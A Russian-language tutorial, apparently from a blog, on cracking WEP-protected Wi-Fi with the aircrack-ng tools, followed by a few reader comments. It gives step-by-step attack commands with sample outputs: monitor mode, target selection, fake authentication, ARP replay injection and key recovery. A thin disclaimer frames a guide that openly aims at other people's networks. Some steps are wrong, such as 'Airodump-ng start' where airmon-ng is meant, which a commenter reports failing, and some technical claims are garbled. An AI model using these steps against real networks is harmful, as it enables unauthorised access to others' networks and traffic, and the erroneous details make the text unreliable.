Как взломать пароль wifi
Требования:
- Linux CMD знания.
- Kali Linux или Backtrack или Ubuntu 7.10 и выше
- Aircrack ng (В Kali Linux он есть)
- Понимание
Информация, содержащаяся в данном руководстве для образовательных и информационных целей, используйте её на свой страх и риск. Мы не несем никакой ответственность за ваши действия.
Шифрование WEP был признан одним из наименее защищенных методов обеспечения безопасности беспроводной точки доступа в истории WiFi. Основной причиной этого является то, что фрагменты ключа посылаются между клиентским компьютером и точкой доступа в 32-битных векторов инициализации. Статистически было показано, что у многих из них слабое шифрование и они уязвимы для анализа пакетов. Количество пакетов, необходимых для взлома ключа варьироваться от 200 до 500 тысяч за 64 и 128-битного шифрования соответственно.
*** ВСЕ КОМАНДЫ, перечисленные в этом уроке запускаются из корневой учетной записи(root) на машине, если вы не используете Kali Linux или вы построили свою собственную систему, Вам необходимо войти в систему как Root или пишите Sudo при каждой команде ***
Первый шаг любого взломщика в точке доступа Wi-Fi, это выбрать цель. Это будет достигнуто путем запуска airmon-ng, чтобы перечислить все доступные сетевые адаптеры.
Пишем в терминале airmon-ng.
Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Введите:
Airodump-ng start (имя адаптера: ath0, wlan0 WLAN1, или какой у вас
Что это делает? Поставит ваш беспроводной адаптер в неразборчивый или монитор режим, который позволит ему принимать весь трафик, и в основном захватить ARP пакеты. Он также позволяет адаптеру впрыскивать пакет в сети, чтобы получить ответ от точки доступа(от Wifi цели).
Напишите команду
Airodump-ng и (имя адаптера: mon0, MON1, eth0)
это будет список всех доступных точек доступа и позволяет выбрать одну.
Вы хотите выбрать один с лучшем сигналом. Способ проверить лучший сигнал, это посмотреть на колонке PWR в то время как программа работает. Сильный сигнал будет низкое число после дефиса (-), такие как -56 или -86. Первый пример будет более сильный, как я считаю.
Мощность измеряется в -dBm или коэффициент мощности в децибелах (дБ) измеренной мощности, отнесенная к одной миливат. Меньшее число более сильный сигнал.
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
После того как вы выбрали цель, запишите BSSID, канал, и объем данных, которые вы приняли. Еще один хороший показатель какую цели взломать. Это иметь разумное количество полученных данных (80-120 без инъекций, может быть и больше).
Запустите команду Airodump-ng -w filename(имя файла) —channel (канал от требуемого) —bssid (ESSID или MAC адрес цели) (интерфейс для захвата на, mon0, eth0).
Помните airmon дает вам в качестве интерфейсного режима контроля, как правило, mon0)
Пример:
airodump-ng -w output --channel 9 --bssid 00:14:6C:7E:40:80 ath0
Откройте отдельную консоль и напишите
aireplay-NG -1 0 -a (ESSID цели) (интерфейс)
это фальшивый запрос на аутентификацию и даст вам что-то вроде этого:
18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful
После того как вы добились успешного результата, то запустите инъекции, чтобы собрать данные.
Чтобы увидеть атаку мы будем запускать эту команду в новом терминале:
aireplay-ng -3 -b (bssid цели) (интерфейс)
Эта команда запускает запрос воспроизведения атаки ARP, который будет стимулировать сбор данных.Это то что вам нужно, чтобы взломать точку доступа Wifi.
Пример:
aireplay-ng -3 -b 00:14:6C:7E:40:80 ath0
Должны увидеть:
Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Откройте еще одно окно консоли, третье, и введите
Aircrack-ng filename.cap
И aircrack будет пытаться крякнуть то, что вы захватили, а если не удастся, она будет отслеживать количество данных которые вам прислали и продолжать пытаться взломать ключ. Когда кряк удался вы увидите на экране это:
Aircrack-ng [00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
Этот экран позволит вам знать, что вы успешно взломали ключ, и вы можете скопировать его до использования или теста. Вы можете скопировать .cap файл на флэш-накопитель и потом крякнуть опять. А если вы потеряете ключ возможно придется взломать его снова.
Это все, что действительно нужно знать, чтобы взломать Wifi с шифровкой WEP.
адаптер обовязковий?
Ввел airodump-ng start wlan0
Выдает bash: Airodump-ng: команда не найдена
Извиняюсь за беспокойство.Исправил!